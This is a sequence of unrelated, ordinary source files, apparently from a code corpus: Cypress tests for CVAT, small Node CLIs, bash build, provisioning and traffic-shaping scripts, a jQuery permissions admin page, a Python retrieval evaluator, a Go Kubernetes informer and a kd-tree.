cy.projectActions(projectName); cy.get('.cvat-project-actions-menu').contains('Delete').click(); cy.get('.cvat-modal-confirm-remove-project') .should('contain', `The project ${projectID} will be deleted`) .within(() => { cy.contains('button', 'Delete').click(); }); if (expectedResult === 'success') { cy.get('.cvat-projects-project-item-card').should('have.css', 'opacity', '0.5'); } else if (expectedResult === 'fail') { cy.get('.cvat-projects-project-item-card').should('not.have.css', 'opacity', '0.5'); } }); Cypress.Commands.add('exportProject', ({ projectName, type, dumpType, archiveCustomeName, }) => { cy.projectActions(projectName); cy.get('.cvat-project-actions-menu').contains('Export dataset').click(); cy.get('.cvat-modal-export-project').should('be.visible').find('.cvat-modal-export-select').click(); cy.contains('.cvat-modal-export-option-item', dumpType).should('be.visible').click(); cy.get('.cvat-modal-export-select').should('contain.text', dumpType); if (type === 'dataset') { cy.get('.cvat-modal-export-project').find('[type="checkbox"]').should('not.be.checked').check(); } if (archiveCustomeName) { cy.get('.cvat-modal-export-project').find('.cvat-modal-export-filename-input').type(archiveCustomeName); } cy.get('.cvat-modal-export-project').contains('button', 'OK').click(); cy.get('.cvat-notification-notice-export-project-start').should('be.visible'); }); Cypress.Commands.add('importProject', ({ projectName, format, archive, }) => { cy.projectActions(projectName); cy.get('.cvat-project-actions-menu').contains('Import dataset').click(); cy.get('.cvat-modal-import-dataset').find('.cvat-modal-import-select').click(); if (format === 'Sly Point Cloud Format') { cy.get('.ant-select-dropdown') .not('.ant-select-dropdown-hidden') .trigger('wheel', { deltaY: 1000 }); } cy.contains('.cvat-modal-import-dataset-option-item', format).click(); cy.get('.cvat-modal-import-select').should('contain.text', format); cy.get('input[type="file"]').last().attachFile(archive, { subjectType: 'drag-n-drop' }); cy.get(`[title="${archive}"]`).should('be.visible'); cy.contains('button', 'OK').click(); cy.get('.cvat-modal-import-dataset-status').should('be.visible'); cy.get('.cvat-notification-notice-import-dataset-start').should('be.visible'); cy.get('.cvat-modal-import-dataset-status').should('not.exist'); }); Cypress.Commands.add('backupProject', (projectName) => { cy.projectActions(projectName); cy.get('.cvat-project-actions-menu').contains('Backup Project').click(); }); Cypress.Commands.add('restoreProject', (archiveWithBackup) => { cy.intercept('POST', '/api/projects/backup?**').as('restoreProject'); cy.get('.cvat-import-project').click().find('input[type=file]').attachFile(archiveWithBackup); cy.wait('@restoreProject', { timeout: 5000 }).its('response.statusCode').should('equal', 202); cy.wait('@restoreProject').its('response.statusCode').should('equal', 201); cy.contains('Project has been created succesfully') .should('exist') .and('be.visible'); cy.get('[data-icon="close"]').click(); // Close the notification }); Cypress.Commands.add('getDownloadFileName', () => { cy.intercept('GET', '**=download').as('download'); cy.wait('@download').then((download) => { const filename = download.response.headers['content-disposition'].split(';')[1].split('filename=')[1]; // need to remove quotes return filename.substring(1, filename.length - 1); }); }); Cypress.Commands.add('waitForDownload', () => { cy.getDownloadFileName().then((filename) => { cy.verifyDownload(filename); }); }); Cypress.Commands.add('deleteProjectViaActions', (projectName) => { cy.get('.cvat-project-top-bar-actions').trigger('mouseover'); cy.get('.cvat-project-actions-menu').within(() => { cy.contains('[role="menuitem"]', 'Delete').click(); }); cy.get('.cvat-modal-confirm-remove-project').within(() => { cy.contains('button', 'Delete').click(); }); cy.contains('.cvat-projects-project-item-title', projectName).should('not.exist'); }); Cypress.Commands.add('assignProjectToUser', (user) => { cy.get('.cvat-project-details').within(() => { cy.get('.cvat-user-search-field').click().type(user); cy.wait(300); }); cy.get('.ant-select-dropdown') .not('.ant-select-dropdown-hidden') .within(() => { cy.get(`.ant-select-item-option[title="${user}"]`).click(); }); }); Cypress.Commands.add('closeNotification', (className) => { cy.get(className).find('span[aria-label="close"]').click(); cy.get(className).should('not.exist'); }); Cypress.Commands.add('movingTask', (taskName, projectName, labelMappingFrom, labelMappingTo, fromTask) => { if (fromTask) { cy.contains('.cvat-text-color', 'Actions').click(); } else { cy.contains('strong', taskName).parents('.cvat-tasks-list-item').find('.cvat-menu-icon').click(); } cy.get('.cvat-actions-menu') .should('be.visible') .find('[role="menuitem"]') .filter(':contains("Move to project")') .last() .click(); cy.get('.cvat-task-move-modal').find('.cvat-project-search-field').click(); cy.get('.ant-select-dropdown') .last() .should('be.visible') .within(() => { cy.get(`[title="${projectName}"]`).click(); }); if (labelMappingFrom !== labelMappingTo) { cy.get('.cvat-move-task-label-mapper-item').within(() => { cy.contains(labelMappingFrom).should('exist'); cy.get('.cvat-move-task-label-mapper-item-select').should('be.visible').click(); }); cy.get('.ant-select-dropdown') .last() .should('be.visible') .find(`[title="${labelMappingTo}"]`).click(); } else { cy.get('.cvat-move-task-label-mapper-item').within(() => { cy.get('.cvat-move-task-label-mapper-item-select').should('have.text', labelMappingFrom); }); } cy.get('.cvat-task-move-modal').within(() => { cy.contains('button', 'OK').click(); }); });
<filename>index.js #!/usr/bin/env node const fetch = require('node-fetch') const open = require('open') const arg = require('arg') const inquirer = require('inquirer') function ParseCliArgsIntoOptions() { const args = arg( { '--website': Boolean, '--yes': Boolean, '-w': '--website', '-y': '--yes' }, { argv: process.argv.slice(2) } ) return { website: args['--website'] || false } } async function PromptForOptions(options) { const questions = []; if (!options.website) { questions.push({ type: 'confirm', name: 'website', message: 'Open the website on your browser?', default: false, }); } const answers = await inquirer.prompt(questions); return { ...options, website: options.website || answers.website, }; } async function LaunchWebsite(result) { let options = ParseCliArgsIntoOptions(); options = await PromptForOptions(options); if (options.website == true) { open(`https://${result.domain}`); } } const site = process.argv[2] function CheckSite(name) { if (name.indexOf('.') > -1) { const info = fetch(`https://isitup.org/${name}.json`) .then(response => response.json()) info.then(function(result) { console.log(result.response_code) switch(result.response_code) { case 200: console.log('\x1b[32m%s\x1b[0m', 'website appears to be up and running') LaunchWebsite(result) break case 301: console.log('\x1b[34m%s\x1b[0m', 'website has been moved permanently but appears to be up and running') LaunchWebsite(result) break case 302: console.log('\x1b[34m%s\x1b[0m', 'website has a temporary redirect but appears to be up and running') LaunchWebsite(result) break case 403: console.log('\x1b[33m%s\x1b[0m', 'website information not found') LaunchWebsite(result) break default: console.log('\x1b[31m%s\x1b[0m', 'website appears to be down') break } }) } else { console.log('\x1b[31m%s\x1b[0m', 'please append a url extension (whatever.com)') } } CheckSite(site)
#include <iostream> using namespace std; bool isPrime(int n) { // Corner cases if (n <= 1) return false; if (n <= 3) return true; // This is checked so that we can skip // middle five numbers in below loop if (n % 2 == 0 || n % 3 == 0) return false; for (int i = 5; i * i <= n; i = i + 6) if (n % i == 0 || n % (i + 2) == 0) return false; return true; } int main() { int low = 100; int high = 500; for (int i = low; i <= high; i++) if (isPrime(i)) cout << i << endl; return 0; }
<filename>src/index.js #!/usr/bin/env node const program = require('commander'); const AboutMeLogger = require('./loggers/AboutMeLogger.js'); const ExperienceLogger = require('./loggers/ExperienceLogger.js'); const EducationLogger = require('./loggers/EducationLogger.js'); program .name('joeltankam') .option('-m, --about-me', 'output information about me 👨🏽‍💼') .option('-e, --experience', 'output my professional experience 💻') .option('-d, --education', 'output my education 👨‍🎓') .option('-s, --skills', 'output my skill highlights 👨‍💻') .option('-c, --awards', 'output my awards and certifications 🏆') .option('-l, --languages', 'output my language skills 🌍') .option('-r, --references', 'output my references 👨‍⚖️') .option('-o, --hobbies', 'output my hobbies 🕺') .option('-a, --all', 'output everything ⚛'); program.parse(process.argv); const summaryData = require('../assets/about.json'); new AboutMeLogger(summaryData, program.aboutMe || program.all).log(); if (program.experience || program.all) { console.log(); const experienceData = require('../assets/experience.json'); new ExperienceLogger(experienceData).log(); } console.log(); if (program.education || program.all) { console.log(); const educationData = require('../assets/education.json'); new EducationLogger(educationData).log(); } console.log(); if (!process.argv.slice(2).length) { program.outputHelp(); }
#!/usr/bin/env bash # # Remove network configuration # # CentOS 7 is setting the MAC address as HWADDR parameter in the network # configuration files (/etc/sysconfig/network-scripts/ifcfg-e*) # [ifcfg-enp0s31f6, ifcfg-eth0] # These files can be removed, because default config are regenarted if necessary. set -o errexit network_config_locations=( "/etc/sysconfig/network-scripts/ifcfg-e*" ) netplan_networkd_config="/etc/netplan/01-netcfg.yaml" netplan_networkmanager_config="/etc/netplan/01-network-manager-all.yaml" # network: Remove network-scripts/ifcfg-e* config files # * /etc/sysconfig/network-scripts/ifcfg-e* echo "*** Remove network-scripts/ifcfg-e* config files" # Include hidden files in glob shopt -s nullglob # shellcheck disable=SC2068 for network_config in ${network_config_locations[@]}; do rm "${network_config}" done # This needs to be executed on the Ubuntu server installation (mini.iso) when installing Desktop environment using # `tasksel tasksel/first multiselect ubuntu-desktop` # By default Ubuntu server installation (mini.iso) creates the `/etc/netplan/01-netcfg.yaml` and installing ubuntu-desktop using tasksel # adds `/etc/netplan/01-network-manager-all.yaml`. Having both these files for Ubuntu Desktop brings problems. # Some details can be found here: https://github.com/hashicorp/vagrant/issues/11378 # In short the `/etc/netplan/01-netcfg.yaml` should not be present on the Ubuntu Desktop installation. # `/etc/netplan/01-network-manager-all.yaml` should be used for NetworkManager configuration (only) echo "*** Remove /etc/netplan/01-netcfg.yaml in Ubuntu Desktop" if [[ -s "${netplan_networkd_config}" ]] && [[ -s "${netplan_networkmanager_config}" ]]; then rm "${netplan_networkd_config}" fi exit 0
<reponame>JSandME/ICS $(function() { var Permission = function() { var handlePermissionTable = function() { $(function() { var url = "rest/adminPermission/getDate"; $("#reportTable").bootstrapTable({ url : url, dataType:"JSON", //返回JSON格式数据 idField : "id", toolbar: '#toolbar', //工具按钮用哪个容器 striped: true, //是否显示行间隔色 cache: false, //是否使用缓存,默认为true,所以一般情况下需要设置一下这个属性(*) pagination: true, //是否显示分页(*) sortable: false, //是否启用排序 sortOrder: "asc", //排序方式 pageNumber:1, //初始化加载第一页,默认第一页 pageSize: 10, //每页的记录行数(*) pageList : [10, 25, 50, 100, 1000], showRefresh : true, //是否显示刷新按钮 search : true, singleSelect : true, clickToSelect : true, showExport: false, //是否显示导出 exportDataType: "all", //basic', 'all', 'selected'. minimumCountColumns: 2, //最少允许的列数 responseHandler: responseHandler, //sidePagination: "server", //服务端处理分页 queryParams : function(param) { return {}; }, columns : [ { checkbox : true }, { field : "permissionName", title : "权限名", editable : { type : 'text', title : '权限名', validate : function(v) { if (!v) return '权限名不能为空'; } } }, { field : "permissionSign", title : "权限标识", editable : { type : 'select', title : '权限标识', source : function(){ var result = []; $.ajax({ type : "GET", async: false, cache : true, url : "rest/adminPermission/getPermissionName", data : {}, dateType : 'JSON', success : function(data, status){ $.each(eval(data), function(index, element){ result.push({value : element.key, text : element.key}); }); } }); return result; } } }, { field : "description", title : "权限描述", editable : { type : 'text', title : '权限描述', validate : function(v) { if (!v) return '角色描述不能为空'; } } }, { title: '操作', field: 'id', align: 'center', formatter:function(value,row,index){ var e = '<a href="#" mce_href="#" onclick="editRow(\''+ row.id + '\')">编辑</a> '; var d = '<a href="#" mce_href="#" onclick="delRow(\''+ row.id + '\');$(\'.rerefresh\').click()">删除</a> '; return e+d; } }], onEditableSave : function(field, row, oldValue, $el) { $("#reportTable").bootstrapTable("resetView"); $.ajax({ type : "post", url : "rest/adminPermission/updatePermission", data : row, dataType : 'JSON', success : function(data, status) { if(status == "success"){ alert("更新成功。"); $('#reportTable').bootstrapTable('refresh'); } }, error : function(data, status) { alert(status); alert("更新失败。"); }, complete : function() { } }); } }); $("#reportTable tr th").css("background-color", "#ddd"); //改变table表头背景色 $("#reportTable tr th").css("color", "#000000");//改变table表头字体颜色 $("#reportTable tr th").css("font-family", "#Microsoft Yahei");//改变table表头字体样式 //alert($("#fixed-table-toolbar").html()); /*$(".fixed-table-toolbar").append( '<div style="padding-top:10px">'+// '<a href="javascript:void(0)" onclick="" class="btn btn-info col-sm-1">新增</a>'+ '</div>');*/ //set进table之前进行数据处理 function responseHandler(res) { //alert(JSON.stringify(res)); //var rows=res.rows; return res; } $.ajax({ type : "GET", async: true, cache : true, url : "rest/adminPermission/getPermissionName", data : {}, dateType : 'JSON', success : function(data, status){ $.each(eval(data), function(index, element){ $('#permissioSign').append("<option value='" + element.key + "'>" + element.key + "</option>"); }); } }); $('#reportTable').on('check.bs.table uncheck.bs.table ' + 'check-all.bs.table uncheck-all.bs.table', function () { $('#remove').prop('disabled', !$('#reportTable').bootstrapTable('getSelections').length); // save your data, here just save the current page selections = getIdSelections(); // push or splice the selections if you want to save all data selections }); $('#remove').click(function () { var ids = getIdSelections(); /*$('#reportTable').bootstrapTable('remove', { field: 'id', values: ids });*/ $('#remove').prop('disabled', true); }); }); }; return { init : function() { handlePermissionTable(); } }; }(); Permission.init(); }); function delRow(id){ $.ajax({ type : 'post', url : "rest/adminPermission/deletePermission", async : false, data : { id : id}, cache : false, success : function(data ,status){ alert("删除成功。"); $('#reportTable').bootstrapTable('refresh'); }, error : function(data, status) { alert("删除失败。"); }, }); } function editRow(id){ $.ajax({ type : 'post', url : "rest/adminPermission/getPermission", async : true, data : { id : id}, cache : false, success : function(data ,status){ $('#id').val(data.id); $('#permissionName').val(data.permissionName); $('#permissionSign').val(data.permissionSign); $('#description').val(data.description); } }); $('#light').css("display","block"); $('#fade').css("display","block"); } function save(){ var id = $('#id').val(); var permissionName = $('#permissionName').val(); var permissionSign = $('#permissionSign').val(); var description = $('#description').val(); if(permissionName == "" || permissionSign == ""){ alert("权限名和权限标签不能为空。"); return ; } $.ajax({ type : 'post', url : "rest/adminPermission/updatePermission", async : true, data : {id:id, permissionName:permissionName,permissionSign:permissionSign,description:description}, cache : false, success : function(data ,status){ $('#light').css("display","none"); $('#fade').css("display","none"); alert("保存成功。"); $('#reportTable').bootstrapTable('refresh'); }, error : function(data, status) { alert("保存失败。"); }, }); } function newPermission(){ $('#id').val(""); $('#permissionName').val(""); $('#permissioSign').val(""); $('#description').val(""); $('#light').css("display","block"); $('#fade').css("display","block"); } function getIdSelections() { return $.map($('#reportTable').bootstrapTable('getSelections'), function (row) { return row.id; }); }
#network interface on which to limit traffic IF="eth0" #limit of the network interface in question LINKCEIL="1gbit" #limit outbound Reden protocol traffic to this rate LIMIT="160kbit" #defines the address space for which you wish to disable rate limiting LOCALNET="192.168.0.0/16" #delete existing rules tc qdisc del dev ${IF} root #add root class tc qdisc add dev ${IF} root handle 1: htb default 10 #add parent class tc class add dev ${IF} parent 1: classid 1:1 htb rate ${LINKCEIL} ceil ${LINKCEIL} #add our two classes. one unlimited, another limited tc class add dev ${IF} parent 1:1 classid 1:10 htb rate ${LINKCEIL} ceil ${LINKCEIL} prio 0 tc class add dev ${IF} parent 1:1 classid 1:11 htb rate ${LIMIT} ceil ${LIMIT} prio 1 #add handles to our classes so packets marked with <x> go into the class with "... handle <x> fw ..." tc filter add dev ${IF} parent 1: protocol ip prio 1 handle 1 fw classid 1:10 tc filter add dev ${IF} parent 1: protocol ip prio 2 handle 2 fw classid 1:11 #delete any existing rules #disable for now #ret=0 #while [ $ret -eq 0 ]; do # iptables -t mangle -D OUTPUT 1 # ret=$? #done #limit outgoing traffic to and from port 9999. but not when dealing with a host on the local network # (defined by $LOCALNET) # --set-mark marks packages matching these criteria with the number "2" # these packages are filtered by the tc filter with "handle 2" # this filter sends the packages into the 1:11 class, and this class is limited to ${LIMIT} iptables -t mangle -A OUTPUT -p tcp -m tcp --dport 9999 ! -d ${LOCALNET} -j MARK --set-mark 0x2 iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 9999 ! -d ${LOCALNET} -j MARK --set-mark 0x2
We can detect whether a given set of numbers contains duplicate elements by using a hash set. We can loop through the set and add each element in the set to the hash set. If an element already exists in the set, then it is a duplicate element and can be identified.
# Clean up previous distributions rm -rf dist rm -rf build # Variable pointing to NGC NGC="node node_modules/.bin/ngc" ROLLUP="node node_modules/.bin/rollup" # Run Angular Compiler $NGC -p src/tsconfig-build.json $ROLLUP -c rsync -a --exclude=*.js build/ dist cp src/package.json dist/package.json
<reponame>JakobLangenbahn/crosslingual-information-retrieval """ Class for evaluation methods on the BLI task. """ import os import sys import numpy as np sys.path.append(os.path.dirname(os.path.abspath(__file__))) from utils import normalize_matrix from load_monolingual import load_translation_dict class Evaluator(): """Evaluates Method on BLI Task. Attributes: test_translation_source (list): List of source translation words. test_translation_target (list): List of source target words. CrossLingualModel (class): Class of Method to be evaluated (e.g. VecMap). """ # Test Translation Dictionary test_translation_source = [] test_translation_target = [] CrossLingualModel = None def __init__(self, CrossLingualModel, test_translation_dict_path): """ Initialize class with Class of Method and translation dictionary. Args: CrossLingualModel: Class, Class of Method to be evaluated (e.g. VecMap). test_translation_dict_path: Path to test dictionary. """ # Built Test Translation Dictionary self.test_translation_source, self.test_translation_target = load_translation_dict(test_translation_dict_path) # Select CrossLingualModel to test self.CrossLingualModel = CrossLingualModel def evaluation_on_BLI(self, verbose=0): """ Start Evaluation on given Test translation dictionary. Args: verbose: Set to 1, to see top 3 predictions of the first 5 words. Returns: """ ranking = [] iteration = 0 norm_proj_src_emb = normalize_matrix(self.CrossLingualModel.proj_embedding_source_target) for test_src_word, test_trg_word in zip(self.test_translation_source, self.test_translation_target): source_index = self.CrossLingualModel.src_word2ind[ test_src_word] if test_src_word in self.CrossLingualModel.src_word2ind.keys() else -1 target_index = self.CrossLingualModel.trg_word2ind[ test_trg_word] if test_trg_word in self.CrossLingualModel.trg_word2ind.keys() else -1 if source_index == -1 or target_index == -1: continue # Calculate Cos Similarity norm_proj_src_word_emb = norm_proj_src_emb[[source_index]] similarity_cos = np.dot(norm_proj_src_word_emb, np.transpose(self.CrossLingualModel.norm_trg_embedding_matrix)) # Find Closest Neighbors most_similar_trg_index = np.argsort(-similarity_cos[[0]]) find_rank = np.where(most_similar_trg_index == target_index)[1][0] + 1 ranking.append(find_rank) if iteration <= 5 and verbose: print("\nTest translation: {} -> {}".format(test_src_word, self.CrossLingualModel.trg_ind2word[target_index])) print("Predicted Top 3 Translations: {}, {}, {}".format( self.CrossLingualModel.trg_ind2word[most_similar_trg_index[0, 0]], self.CrossLingualModel.trg_ind2word[most_similar_trg_index[0, 1]], self.CrossLingualModel.trg_ind2word[most_similar_trg_index[0, 2]])) iteration += 1 if len(ranking) == 0: print("NO MATCHING FOUND!") else: print("\n\nNumber of Test Translations: {}/{}".format(len(ranking), len(self.test_translation_source))) p1 = len([p for p in ranking if p <= 1]) / len(ranking) p5 = len([p for p in ranking if p <= 5]) / len(ranking) p10 = len([p for p in ranking if p <= 10]) / len(ranking) print("P@1: {}".format(p1)) print("P@5: {}".format(p5)) print("P@10: {}".format(p10)) mrr = sum([1.0 / p for p in ranking]) / len(ranking) print("\n\nMRR: {}".format(mrr))
<reponame>briankim31415/CirQuick "use strict"; /* tslint:disable */ /* eslint-disable */ /** * cirquick * Backend for Cirquick * * OpenAPI spec version: 1.0.0 * * * NOTE: This class is auto generated by the swagger code generator program. * https://github.com/swagger-api/swagger-codegen.git * Do not edit the class manually. */ Object.defineProperty(exports, "__esModule", { value: true });
// Copyright 2018-2019 VMware, Inc. // SPDX-License-Identifier: Apache-2.0 package kubecluster import ( "encoding/json" "fmt" "strings" "time" "github.com/golang/glog" "github.com/vmware-tanzu/watch-proxy/config" apps_v1 "k8s.io/api/apps/v1" core_v1 "k8s.io/api/core/v1" networking_v1beta1 "k8s.io/api/networking/v1beta1" "k8s.io/apimachinery/pkg/fields" "k8s.io/apimachinery/pkg/runtime" "k8s.io/client-go/kubernetes" lister_apps_v1 "k8s.io/client-go/listers/apps/v1" lister_core_v1 "k8s.io/client-go/listers/core/v1" lister_networking_v1beta1 "k8s.io/client-go/listers/networking/v1beta1" "k8s.io/client-go/rest" "k8s.io/client-go/tools/cache" "k8s.io/client-go/util/workqueue" ) const ( addKey = "add" updateKey = "update" DeleteKey = "delete" ) // Listers which hold cached k8s objects for later lookup var ( NsLister lister_core_v1.NamespaceLister PoLister lister_core_v1.PodLister NoLister lister_core_v1.NodeLister CmLister lister_core_v1.ConfigMapLister SvcLister lister_core_v1.ServiceLister SecretLister lister_core_v1.SecretLister DeployLister lister_apps_v1.DeploymentLister RsLister lister_apps_v1.ReplicaSetLister IngLister lister_networking_v1beta1.IngressLister ) // Informer is capable of starting and stopping an running informer. type Informer interface { Start() Stop() } // InformerClient contains configuration for instantiating an informer. Use NewInformerClient to // ensure valid configuration is provided. type InformerClient struct { client *kubernetes.Clientset rest *rest.Interface resource string ignoreNamespaces []string k8sObjectType runtime.Object resyncTime time.Duration processQueue workqueue.RateLimitingInterface done chan bool allowAddEvent bool skipAddEventTime time.Duration clusterName string } // InformerClients is a wrapper around []*InformerClient to allow methods to be added such as the // need to find an InformerClient within the list based on resource. type InformerClients []*InformerClient // NewInformerClient returns an InformerClient capable of starting an informer to watch all events // a specific k8s object type. It returns an error when the request object type (specified in the // resource argument is not known to watch-proxy. The arguments it takes are as follows. // // * client: kubernetes.Clientset used for generating REST clients capable for communicating with // kubernetes // * resource: the type of k8s object the informer will watch for events on. e.g. pods, // deployments, or namespaces // * nsSelector: scopes the informer to only watch objects in a specific namespace. An empty string // represents all namespaces. // * pQueue: processor queue where all events should be dropped for future processing. func NewInformerClient(client *kubernetes.Clientset, resource string, nsSelector string, pQueue workqueue.RateLimitingInterface, config config.Config) (*InformerClient, error) { r, obj, err := getRuntimeObjectConfig(client, resource) if err != nil { return nil, err } delay, err := time.ParseDuration(config.DelayStartSeconds) if err != nil { delay = 0 * time.Second glog.Warningf("%s: no valid delayAddEventDuration, watch-proxy will process all events without delay. error: %s. "+ "no delay will be applied.", resource, err.Error()) } resyncDuration, err := time.ParseDuration(config.ForceReuploadDuration) if err != nil { resyncDuration = 0 * time.Second glog.Warningf("%s: no valid forceReuploadDuration set, watch-proxy will not attempt to periodically re-upload"+ " all kubernetes objects.", resource) } doneChannel := make(chan bool) ic := &InformerClient{ rest: r, ignoreNamespaces: config.IgnoreNamespaces, k8sObjectType: obj, resource: resource, resyncTime: resyncDuration, processQueue: pQueue, done: doneChannel, skipAddEventTime: delay, clusterName: config.ClusterName, } return ic, nil } // configureUID takes a kubernetes object and traverses the metadata field to locate the value of the UID // if not UID is found or the metadata is non-existent, an empty string is returned. Additionally i adds the field // metadata.uniqueID to the object to be emitted. func configureUID(obj interface{}) string { // TODO(joshrosso): There has to be a better way to do this than marshling in and out of JSON b, err := json.Marshal(obj) if err != nil { return "" } var k8sObj map[string]interface{} err = json.Unmarshal(b, &k8sObj) if err != nil { return "" } metadata, ok := k8sObj["metadata"] if !ok { glog.Errorf("Failed to locate metadata.uid used for emitting object.") return "" } return fmt.Sprintf("%s", metadata.(map[string]interface{})["uid"]) } // Start instantiates an informer and begins the watch for resource events. The informer's // resulting controller is run in its own go routine and Start will block until a signal is sent to // the InformerClient's Done channel. Upon that signal, the controller's go routine will is stopped // Start will return. func (ic InformerClient) Start() { if ic.skipAddEventTime > 0*time.Second { go ic.startSkipAddEventTimer() } else { ic.allowAddEvent = true } // watcher and lister configuration for informer watchlist := cache.NewListWatchFromClient(*ic.rest, ic.resource, "", fields.Everything()) // eventhandlers describing what to do upon add, update, and delete events. eHandlers := cache.ResourceEventHandlerFuncs{ AddFunc: func(obj interface{}) { if !ic.ignoreNamespace(obj) { if !ic.addEventAllowed() { glog.Infof("skipping add for %s. start delay in effect", configureUID(obj)) return } if key, err := cache.MetaNamespaceKeyFunc(obj); err == nil { ic.processQueue.AddRateLimited(fmt.Sprintf("%s|%s|%s|%s|x", addKey, ic.clusterName+"-"+configureUID(obj), ic.resource, key)) } } }, UpdateFunc: func(oldObj, newObj interface{}) { if !ic.ignoreNamespace(newObj) { if key, err := cache.MetaNamespaceKeyFunc(newObj); err == nil { ic.processQueue.AddRateLimited(fmt.Sprintf("%s|%s|%s|%s|x", updateKey, ic.clusterName+"-"+configureUID(newObj), ic.resource, key)) } } }, DeleteFunc: func(obj interface{}) { if !ic.ignoreNamespace(obj) { if key, err := cache.DeletionHandlingMetaNamespaceKeyFunc(obj); err == nil { mObj, err := json.Marshal(obj) if err != nil { glog.Errorf("failed to marshal deleted object: %s", err) } ic.processQueue.AddRateLimited(fmt.Sprintf("%s|%s|%s|%s|%s", DeleteKey, ic.clusterName+"-"+configureUID(obj), ic.resource, key, mObj)) } } }, } // informer creation, returning indexer used in lister generation and controller capable of // starting event watches. indexer, controller := cache.NewIndexerInformer(watchlist, ic.k8sObjectType, ic.resyncTime, eHandlers, cache.Indexers{}) // attempt to create globally accessible listers that can be used to lookup k8s objects that // events had previously fired for. err := initLister(indexer, ic.k8sObjectType) if err != nil { glog.Errorln(err.Error()) return } // run the controller and block until a stop signal is received via the ic.Done channel. upon // receiving the signal, stop the controller and return from this function. stop := make(chan struct{}) go controller.Run(stop) glog.Infof("informer is active for resource: %s", ic.resource) <-ic.done close(stop) glog.Infof("informer has been stopped for resource: %s", ic.resource) } // Stop tells the InformerClient's controller (watcher, indexer, etc) to stop. func (ic InformerClient) Stop() { ic.done <- true } // FindInformerClient looks up an InformerClient responsible for handling the passes resource. func (ics InformerClients) FindInformerClient(resource string) *InformerClient { for _, ic := range ics { if ic.resource == resource { return ic } } glog.Errorf("Expected to find existing informer client for resource %s. Found nothing.", resource) return nil } // RemoveInformerClient returns a new InformerClients slice with the passed removeIc // (InformerClient) removed from the list. func RemoveInformerClient(ics InformerClients, removeIc *InformerClient) InformerClients { for i, ic := range ics { if ic == removeIc { ics = append(ics[:i], ics[i+1:]...) } } return ics } // getRuntimeObjectConfig returns the appropriate rest client and runtime object type based on the // resource argument. the kubernetes.Clientset argument is used to construct the rest client. func getRuntimeObjectConfig(client *kubernetes.Clientset, resource string) (*rest.Interface, runtime.Object, error) { var rest rest.Interface var obj runtime.Object switch resource { case "namespaces": rest = client.CoreV1().RESTClient() obj = &core_v1.Namespace{} case "pods": rest = client.CoreV1().RESTClient() obj = &core_v1.Pod{} case "nodes": rest = client.CoreV1().RESTClient() obj = &core_v1.Node{} case "configmaps": rest = client.CoreV1().RESTClient() obj = &core_v1.ConfigMap{} case "secrets": rest = client.CoreV1().RESTClient() obj = &core_v1.Secret{} case "services": rest = client.CoreV1().RESTClient() obj = &core_v1.Service{} case "ingresses": rest = client.NetworkingV1beta1().RESTClient() obj = &networking_v1beta1.Ingress{} case "deployments": rest = client.AppsV1().RESTClient() obj = &apps_v1.Deployment{} case "replicasets": rest = client.AppsV1().RESTClient() obj = &apps_v1.ReplicaSet{} default: return nil, nil, fmt.Errorf("object type requested is not recognized. type: %s", resource) } return &rest, obj, nil } // initLister initializes a globally accessible k8s object lister based objType passed. objType // should be one of runtime.Object. The indexer argument must be the indexer that's returned upon // generating an informer; a step that is done when calling Informer.Start(). This globally // accessible lister is used by the processor package to lookup, via cache, objects that may // eventually be emitted. func initLister(i cache.Indexer, objType interface{}) error { switch t := objType.(type) { case *core_v1.Namespace: NsLister = lister_core_v1.NewNamespaceLister(i) case *core_v1.Pod: PoLister = lister_core_v1.NewPodLister(i) case *core_v1.Node: NoLister = lister_core_v1.NewNodeLister(i) case *core_v1.ConfigMap: CmLister = lister_core_v1.NewConfigMapLister(i) case *core_v1.Service: SvcLister = lister_core_v1.NewServiceLister(i) case *networking_v1beta1.Ingress: IngLister = lister_networking_v1beta1.NewIngressLister(i) case *core_v1.Secret: SecretLister = lister_core_v1.NewSecretLister(i) case *apps_v1.Deployment: DeployLister = lister_apps_v1.NewDeploymentLister(i) case *apps_v1.ReplicaSet: RsLister = lister_apps_v1.NewReplicaSetLister(i) default: return fmt.Errorf("Failed to init lister due to inability to infer type. Type was %s", t) } return nil } // addEventAllowed checks for whether the add event should be skipped. This is based on a timer that is // set when a skipAddEventTime is set. func (ic InformerClient) addEventAllowed() bool { return ic.allowAddEvent } // ingoreNamespace checks to see if the object's namespace is being ignored // if an object's namespace is in the ignore list, true is returned // if an object's namespace is *not* in the ignore list, false is returned func (ic InformerClient) ignoreNamespace(obj interface{}) bool { b, err := json.Marshal(obj) if err != nil { glog.Errorf("Failed to marshal object json: %s", err) } var k8sObj map[string]interface{} err = json.Unmarshal(b, &k8sObj) if err != nil { glog.Errorf("Failed to unmarshal K8s object json: %s", err) } metadata, ok := k8sObj["metadata"] if !ok { glog.Errorf("Failed to identify namespace for %s", metadata.(map[string]interface{})["selfLink"].(string)) } for _, n := range ic.ignoreNamespaces { selfLink := metadata.(map[string]interface{})["selfLink"].(string) if strings.Contains(selfLink, fmt.Sprintf("namespaces/%s", n)) == true { return true } } return false } // startSkipAddEventTimer creates a timer for the duration set in the InformerClient's // skipAddEventTime attribute. It blocks until the timer has finished then sets the allowedAddEvent // flag to true, signifying that the client can now queue add events it receives from the // kubernetes API server. func (ic *InformerClient) startSkipAddEventTimer() { t := time.NewTimer(ic.skipAddEventTime) // wait for return on timer's channel then set allowAddEvent flag to true glog.Infof("add event delay in effect for %s resource watch for %v duration", ic.resource, ic.skipAddEventTime) <-t.C ic.allowAddEvent = true glog.Infof("add event delay ended for %s resource watch", ic.resource) } // String pretty prints InformerClients. func (ics InformerClients) String() string { o := "[" for i, ic := range ics { o += ic.resource if i != len(ics)-1 { o += ", " } } o += "]" return o }
class Node: def __init__(self, point=None, left=None, right=None): self.point = point self.axis = None self.left = left self.right = right class KdTree: def __init__(self, points=[]): def build_kdtree(points, depth): if not points: return None axis = depth % 2 points.sort(key = lambda point: point[axis]) mid = len(points) // 2 node = Node(points[mid], build_kdtree(points[:mid], depth+1), build_kdtree(points[mid+1:], depth+1)) node.axis = axis return node self.root = build_kdtree(points, 0)
function intToFloat(int) { return parseFloat(int); }
